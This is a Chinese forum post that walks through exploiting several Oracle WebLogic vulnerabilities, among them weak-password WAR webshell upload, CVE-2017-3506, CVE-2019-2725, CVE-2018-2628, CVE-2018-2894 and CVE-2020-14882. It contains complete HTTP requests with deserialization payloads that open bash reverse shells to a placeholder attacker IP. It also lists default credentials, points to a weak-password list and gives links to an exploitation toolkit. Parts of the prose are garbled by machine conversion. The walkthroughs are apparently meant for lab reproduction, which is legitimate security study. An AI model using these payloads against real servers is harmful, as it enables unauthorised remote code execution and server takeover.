WebLogic常见的几种漏洞

悠扬随风  金牌会员 | 2024-8-22 05:02:51 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 660|帖子 660|积分 1980

背景弱⼝令GetShell

漏洞描述

通过弱⼝令进⼊背景界⾯ , 上传摆设war包 , getshell
影响范围

全版本(前提背景存在弱⼝令)
漏洞复现

默认账号暗码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic 
这⾥留意, 单个账号错误暗码5次之后就会⾃动锁定。
 

 1.登录背景后,点击摆设,点击安装,点击上传⽂件。




2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传 

访问摆设好的木马文件,然后就哥斯拉毗连。
(哥斯拉可以自动生成jsp木马文件,但是生成的木马文件尽量使用哥斯拉毗连)
CVE-2017-3506 

XMLDecoder反序列化漏洞
漏洞描述

Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。
影响版本

受影响版本:WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。
 漏洞复现

访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
 

抓包,然后执行反弹shell的命令
  1. POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
  2. Host: your ip:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Upgrade-Insecure-Requests: 1
  9. Cache-Control: max-age=0
  10. Content-Type: text/xml
  11. Content-Length: 841
  13. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  14.       <soapenv:Header>
  15.         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  16.           <java>
  17.             <object class="java.lang.ProcessBuilder">
  18.               <array class="java.lang.String" length="3">
  19.                 <void index="0">
  20.                   <string>/bin/bash</string>
  21.                 </void>
  22.                                                                 <void index="1">
  23.                   <string>-c</string>
  24.                 </void>
  25.                                                                 <void index="2">
  26.                   <string>bash -i &gt;&amp; /dev/tcp/your ip/4444 0&gt;&amp;1</string>
  27.                 </void>
  28.               </array>
  29.               <void method="start"/>
  30.             </object>
  31.           </java>
  32.         </work:WorkContext>
  33.       </soapenv:Header>
  34.       <soapenv:Body/>
  35.     </soapenv:Envelope>
复制代码

 nc判定一个端口

 CVE-2019-2725

漏洞描述


该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而得到整台服务器的权限。
 受影响WebLogic版本


Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3
漏洞复现

1、访问漏洞地址 _async/AsyncResponseService 出现 Test page字眼,证明存在漏洞

访问 http://ip:7001/_async/AsyncResponseService 使用POST方法发送特定的xml数据,可以实现各种命令执行。
  1. POST /_async/AsyncResponseService HTTP/1.1
  2. Host: your ip:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Cookie: ADMINCONSOLESESSION=6GvQhQCSj7brk6LwTpPnt22gTpb3JxynjPGk6FW3xVwMzznJhM2W!1628766885
  9. Upgrade-Insecure-Requests: 1
  10. Cache-Control: max-age=0
  11. Content-Type: text/xml
  12. Content-Length: 794
  15. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
  16. xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  17. <soapenv:Header>
  18. <wsa:Action>xx</wsa:Action>
  19. <wsa:RelatesTo>xx</wsa:RelatesTo>
  20. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  21. <void class="java.lang.ProcessBuilder">
  22. <array class="java.lang.String" length="3">
  23. <void index="0">
  24. <string>/bin/bash</string>
  25. </void>
  26. <void index="1">
  27. <string>-c</string>
  28. </void>
  29. <void index="2">
  30. <string>bash -i &gt;&amp; /dev/tcp/your ip/4444 0&gt;&amp;1</string>
  31. </void>
  32. </array>
  33. <void method="start"/></void>
  34. </work:WorkContext>
  35. </soapenv:Header>
  36. <soapenv:Body>
  37. <asy:onAsyncDelivery/>
  38. </soapenv:Body></soapenv:Envelope>
复制代码


 继承nc监听端口,也可以写个木马,访问,用工具毗连
CVE-2018-2628

 漏洞描述


Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和别的Java程序(客户端或者别的Weblogic Server实例)之间传输数据, 服务器实例会跟踪毗连到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信毗连, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。
 受影响WebLogic版本


Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
漏洞复现

访问靶场

 直接使⽤利⽤⼯具(Liqun⼯具箱)
夸克网盘下载地址:https://pan.quark.cn/s/856a1c07b48b
百度网盘下载地址:https://pan.baidu.com/s/1UuhVF_o2Vxl1Za0TZlRoiw?pwd=ofox
官方地址:https://github.com/One-Fox-Security-Team/One-Fox-T00ls
 ​​​​​​​

用liqun扫描上传木马之后,还是用工具毗连
 CVE-2018-2894

漏洞描述


CVE-2018-2894漏洞存在于Oracle WebLogic Server的Web服务测试页面(Web Service Test Page)中。这个页面允许用户测试Web服务的功能,但在某些版本中,它包含了一个未经授权的文件上传功能。攻击者可以利用这个漏洞,上传恶意的JSP或其他可执行文件,并在服务器上执行这些文件,从而得到服务器的完全控制权。
受影响的WebLogic Server版本

包括10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。漏洞影响的页面路径为/ws_utc/begin.do和/ws_utc/config.do。
漏洞复现


 这⾥情况背景暗码是随机得,获取暗码: docker-compose logs | grep password

这里我们必要访问一个任意上传jsp文件漏洞功能点的目次位置,扫描目次的时候没有扫出来,但是你上网搜素这个CVE-2018-2894都是可以找到这个目次名字的,/ws_utc/config.do(未授权访问

 这个版本必须开启某些功能才能有这种漏洞
第一步 点击base_domain,后点击这个高级

第二步 把这个web服务勾上,然后再点击保存

第三步 修改ws_utc/config.do下的当前的工作目次
/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir
改为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

 ​​​​​​​

然后开始上传jsp木马文件
 ​​​​​​​

 右键检察元素 , 然后搜索刚上传的木马 , 找到对应时间戳
访问时间戳.jsp

利用工具毗连
CVE-2020-14882 

 漏洞描述


远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特别的 HTTP GET 哀求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接受 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
受影响WebLogic版本


Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
漏洞复现

直接访问 http://192.168.190.1:7001/console/images/%252E%252E%252Fconsole.portal
未授权访问背景 

 抓包然后修改post,写jsp一句话木马反弹shell
  2. <?xml version="1.0" encoding="UTF-8" ?>
  3. <beans xmlns="http://www.springframework.org/schema/beans"
  4.    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  5.    xsi:schemaLocation="http://www.springframework.org/schema/beans
  6. http://www.springframework.org/schema/beans/spring-beans.xsd">
  7.     <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  8.         <constructor-arg>
  9.           <list>
  10.             <value>bash</value>
  11.             <value>-c</value>
  12.             <value><![CDATA[bash -i >& /dev/tcp/ypur ip/6666 0>&1]]></value>
  13.           </list>
  14.         </constructor-arg>
  15.     </bean>
  16. </beans>
复制代码

该漏洞利⽤的缺点是,它要求 Weblogic 服务器能够访问恶意 XML。 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

悠扬随风

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表